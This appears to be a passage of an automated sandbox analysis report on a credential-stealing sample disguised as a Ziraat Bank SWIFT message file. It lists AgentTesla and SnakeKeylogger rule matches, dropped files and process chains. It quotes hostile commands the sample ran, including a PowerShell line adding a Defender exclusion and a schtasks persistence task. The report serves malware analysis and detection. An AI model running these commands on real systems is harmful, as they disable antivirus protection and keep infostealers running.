                          Source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                          Source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: spadixes.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: armsvc.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: alg.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: spadixes.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: armsvc.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: alg.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: server02.exe.5.dr, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                          Source: server02.exe.5.dr, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 5.2.svchost.exe.5800f16.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 5.2.svchost.exe.5800f16.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 5.2.svchost.exe.5800f16.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 5.2.svchost.exe.6f05570.4.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 5.2.svchost.exe.6f05570.4.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 5.2.svchost.exe.6f05570.4.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                          Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@48/28@10/6
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000CCE7A GetLastError,FormatMessageW,0_2_000CCE7A
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_000BB134
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000BAB84 AdjustTokenPrivileges,CloseHandle,0_2_000BAB84
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008FB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_008FB134
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008FAB84 AdjustTokenPrivileges,CloseHandle,2_2_008FAB84
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_000CE1FD
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_000C6532
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_000DC18C
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0008406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0008406B
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,5_2_04BACBD0
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeFile created: C:\Users\user\AppData\Local\bothsidedJump to behavior
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: NULL
                          Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-85573514e2c8fb2a9e7986a9-b
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                          Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-85573514e2c8fb2a-inf
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut8747.tmpJump to behavior
                          Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: server02.exe, 0000000C.00000002.3712810154.0000000002980000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.000000000294E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.000000000296C000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.000000000295E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3717802208.000000000389D000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.000000000298D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeReversingLabs: Detection: 42%
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeFile read: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeProcess created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
                          Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\server02.exe "C:\Users\user~1\AppData\Local\Temp\server02.exe"
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user~1\AppData\Local\Temp\neworigin.exe"
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA3B8.tmp.cmd""
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeProcess created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\server02.exe "C:\Users\user~1\AppData\Local\Temp\server02.exe" Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user~1\AppData\Local\Temp\neworigin.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /fJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA3B8.tmp.cmd""Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: appresolver.dllJump to behavior
